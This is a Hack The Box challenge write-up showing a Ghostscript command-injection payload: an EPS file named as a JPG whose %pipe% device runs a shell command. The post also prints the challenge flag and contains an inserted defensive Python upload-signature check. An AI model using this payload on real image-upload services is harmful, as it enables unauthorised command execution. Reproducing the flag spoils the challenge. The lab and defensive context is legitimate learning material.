PetPet Rcbee | HTB | Challenge
Hello there!!
Welcome back to another blog. In this one I’ll solve “PetPet Rcbee”, a Hack The Box challenge that was released on June 05, 2021.
So let's start by downloading and unzipping the file to our local machine…
These files are of no use to us, so let's move on to the website…
This is the homepage of the website, and there's a way to upload a file. Let's confirm it by uploading a simple PNG image…
Since doggo is my favorite, I’ll upload a pic of him/her.
Yup!! The pic of doggo uploaded successfully. This means that we can perform remote code execution on the website via a file with a jpg/png/jpeg extension.
With the help of Google and other sources, I made a script with which we can directly get the flag of the challenge…
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag >> /app/application/static/petpets/flag.txt) currentdevice putdeviceprops
Copy and paste this code into your favorite text editor or code editor and save it as remote_code.jpg or any other name of your choice…
Next, we upload the image to the website…
I took the screenshot above after uploading the image, so don't get confused here...
Now that our image has been uploaded successfully, navigate to the directory and grab your flag…
http://URL:PORT/static/petpets/flag.txt
Flag : HTB{c0mfy_bzzzzz_rcb33s_v1b3s}
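The file saved as remote_code.jpg is PostScript (its first line is the %!PS-Adobe-3.0 EPSF-3.0 header), not image data, so an upload check that compares the leading bytes with the claimed extension would refuse it. The following is an added example of such a check, not code from the challenge or from the original post; the function names, the accepted-format table and the sample byte strings are assumptions constructed for illustration.

```python
import os

# Leading bytes of the formats the upload form is meant to accept.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
}
# Extension -> format the content must actually be.
EXTENSION_FORMAT = {".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg"}
# PostScript/EPS markers: the text header and the binary (DOS) EPS header.
POSTSCRIPT_MARKERS = (b"%!PS", b"\xc5\xd0\xd3\xc6")


def sniff_format(data: bytes):
    """Return 'png', 'jpeg', 'postscript' or None from the leading bytes."""
    # Tolerate a BOM or whitespace in front of a PostScript header.
    head = data[:64].lstrip(b"\xef\xbb\xbf \t\r\n")
    if head.startswith(POSTSCRIPT_MARKERS):
        return "postscript"
    for name, signatures in IMAGE_SIGNATURES.items():
        if data.startswith(signatures):
            return name
    return None


def check_upload(filename: str, data: bytes):
    """Return (accepted, reason) for an uploaded file."""
    ext = os.path.splitext(filename)[1].lower()
    expected = EXTENSION_FORMAT.get(ext)
    if expected is None:
        return False, "extension not allowed"
    actual = sniff_format(data)
    if actual == "postscript":
        return False, "PostScript/EPS content"
    if actual != expected:
        return False, "content does not match extension"
    return True, "ok"


# Constructed samples: only the first bytes of each kind of file.
SAMPLES = [
    ("doggo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("doggo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"),
    ("remote_code.jpg", b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: -0 -0 100 100\n"),
    ("renamed.jpg", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, check_upload(name, data))
```

A signature check like this is a gate in front of the image-processing code; it does not replace keeping that code and any interpreter it calls patched and restricted to the accepted formats.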
My previous ID “kshitizkr603” was banned by HTB — bots today for * reason.
Thanks for reading.
For any queries, just DM me on Instagram @ig._.anshu